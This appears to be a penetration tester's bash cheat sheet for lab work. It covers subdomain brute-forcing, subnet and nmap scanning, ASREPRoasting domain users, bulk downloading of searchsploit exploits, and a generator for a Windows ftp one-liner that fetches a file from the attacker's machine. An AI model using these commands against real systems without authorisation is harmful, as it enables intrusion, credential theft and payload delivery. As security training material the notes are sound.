# Bash Voodoo **#Figure out whether the last command worked or not** ``` echo $? ``` **#Find out whether a given domain resolves** ``` if host target.com; then echo “It Resolves”; fi ``` **#enumerate subdomains** ``` while read sub; do echo "$sub.sbtuk.net"; done < subdomains.txt #touch a subdomains.txtseparetely, file contains: admin test qa dev www m blog ``` **#Bruteforce subdomains | chmod 777 and run** ``` #!/bin/bash while read sub; do if host $sub.yahoo.com; then echo "$sub.yahoo.com" fi done < subdomains.txt ``` **#Resolving CNAMES script | cnames.sh** ``` ##Use the subdomains.txt list above to enumerate for hostile takeover## #!/bin/bash domain=$1 while read sub; do cname=$(host -t CNAME $sub.$domain | grep 'an alias' | awk '{print $NF}') if [ -z "$cname" ]; then continue fi if ! host $cname &> /dev/null; then echo "$cname did not resolve ($sub.$domain)"; fi done ``` **#Concatenate the scripts to bruteforce yahoo.com** ``` cat subdomains.txt | ./cnames.sh yahoo.com ``` **#export IP variable** ``` export IP=192.168.101.57 nmap -sC -sV -oA quick $IP ``` **#Repeat the last command** ``` !1 OR !! ``` **#Reverse-i search** ``` press ctrl + r , then type dpkg (to look for dpkg in history) ``` **#History tricks** ``` export HISTCONTROL=ignoredups #ignores duplicate commands export HISTIGNORE="&:ls:[bf]g:exit:history" #ignores common commands ``` **#Assign a command to a variable** ``` user=$(whoami) echo $user ``` **#URL generator script** ``` #!/bin/bash for i in {tokyo,beijing,newyork,rome,bangkok,osaka}; do for j in {0..9}; do for k in {0..9}; do echo "http://example/com/$i/$j/$k" >> password.txt done done done ``` **#ping sweep script** ``` #!/bin/bash #if you do a ping-sweep with host the command will take about a second to complete. #And if you run that against 255 hosts I will take a long time to complete. To avoid this we can just deamonize every execution to make it faster. #We #use the & to daemonize it. #!/bin/bash for ip in $(cat ips.txt); do ping -c 1 $ip & done ``` **#Print out all IPs in a given subnet** ``` for ip in $(seq 1 10); do echo 10.11.1.$ip; done #Variation with braces instead of seq to specify a range for i in {0..255}; do echo 10.11.1.$i;done #Same output but using a while loop instead -lt flag stands for “less than” (will print out 1 - 9 and exclude 10) #!/bin/bash # while loop example counter=1 while [ $counter -lt 10 ] do echo "10.11.1.$counter" ((counter++)) done #Create a list of hosts and redirect output to a list.txt #This command will print out all possible addresses in Lab subnet for i in {0..254}; do echo 10.11.1.$i;done #Redirecting output to a file for i in {1..10}; do echo 10.11.1.$i >> list.txt;done ``` **#wget a given target and use grep/bash to filter for subdomains** ``` sudo wget www.megacorpone.com #use grep “href=” to extract all the lines in index.html that contain HTML links grep "href=" index.html #beautify the output grep "href=" index.html | grep "\.megacorpone" | grep -v "www\.megacorpone\.com" | awk -F "http://" '{print $2}' #using cut to only leave subdomains grep "href=" index.html | grep "\.megacorpone" | grep -v "www\.megacorpone\.com" | awk -F "http://" '{print $2}' | cut -d "/" -f 1 #grep -o returns the string defined in the regular expression grep -o '[^/]*\.megacorpone\.com' index.html | sort -u > list.txt ‘[^/]*\.megacorpone\.com’ this is the string we are looking for ``` **#DNS recon scripts** ``` for i in {0..255}; do echo 10.11.1.$i >> list.txt;done Then: for url in $(cat list.txt); do host $url; done #Parse through output grepping for available addresses for url in $(cat list.txt); do host $url; done | grep "has address" | cut -d " " -f 4 | sort -u
 ``` **#Using curl** ``` #Similar to wget technique but with curl curl -s https://www.cisco.com | grep 'href=' | cut -d'/' -f3 | grep 'cisco.com' | cut -d'"' -f1 | sort -u > test #Beautify output curl -s https://www.cisco.com | grep -o '[A-Za-z0-9\._-]*\.*cisco\.com' | sort -u #Parsing with grep for url in $(curl -s https://www.cisco.com | grep -o '[A-Za-z0-9\._-]*\.*cisco\.com' | sort -u); do host $url | grep 'has address' | cut -d' ' -f4; done ``` **#Running Autorecon against an entire subnet** ``` #Use nmap sweep to check all ports nmap -A --open 10.11.1.0/24 -oG Available_nmap-scan_10.11.1.1-254 cat Available_nmap-scan_10.11.1.1-254 | grep -v "Nmap" | awk '{print $2}' | sort -u #Redirect output to another file --> targets.txt cat Available_nmap-scan_10.11.1.1-254 | grep -v "Nmap" | awk '{print $2}' | sort -u > targets.txt autorecon targets.txt ``` **#Workaround to use nmapAutomator against a subnet** ``` for ip in $(cat targets.txt); do bash /usr/local/bin/nmapAutomator.sh --host $ip --type Full -o scan.txt & done ``` **#Reverse lookup script** ``` #!/bin/bash i="1" echo "Please enter first 3 octets. e.g 192.168.1" read subnet while [ $i -le 254 ]; do host -l "$subnet"."$i" i=$(( $i + 1)) done ``` #### #check ASREPRoast for all domain users (without credentials) ``` for user in $(cat users.txt); do GetNPUsers.py -no-pass -dc-ip 10.10.10.161 domain/${user} | grep -v Impacket; done ``` **#Bash customization | edit /etc/bash.bashrc with root privileges** ``` nano /etc/bash.bashrc alias gobustLin = sudo gobuster dir -e u --url http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x php,bak,html,txt,zip ``` **#Search for a given exploit and download all matches** ``` #!/bin/bash #replace redcliff debian with keywords to search for for e in $(searchsploit redcliff debian -w -t | grep http | cut -f 2 -d "|") do exp_name=$(echo $e | cut -d "/" -f 5) url=$(echo $e | sed 's/exploits/raw/') wget -q --no-check-certificate $url -O $exp_name done ``` \#FTP script to spawn a one-liner for downloading ``` #!/bin/bash #Outputs a one liner to paste into a Windows host to create and run a ftp script to download a given file. # Text coloring yellow='\033[1;33m' red='\033[1;91m' nc='\033[0m' echo echo -e "${yellow}This gives you a one liner to paste into a Windows host to create and run a ftp script." echo # change tun0 to your interface if needed ip=$(ifconfig tun0 | grep inet | cut -d" " -f10 | head -1) echo -e "Using IP address of tun0: $ip" echo echo -e "What port do you want the ftp server to run on? Hit enter for default of 21${nc}" read port if [[ -z "$port" ]]; then ftpport="21" else ftpport="$port" fi echo echo -e "${yellow}Enter the username: ${nc}" read user echo echo -e "${yellow}Enter the password: ${nc}" read pass echo echo -e "${yellow}What file do you want the remote host to download?${nc}" read file echo echo -e "${yellow}Paste the below to create a ftp script and run it:${nc}" echo echo "echo open $ip $ftpport>ftp.txt&&echo $user>>ftp.txt&&echo $pass>>ftp.txt&&echo bin>>ftp.txt&&echo get $file>>ftp.txt&&echo bye>>ftp.txt&&ftp -s:ftp.txt" echo ```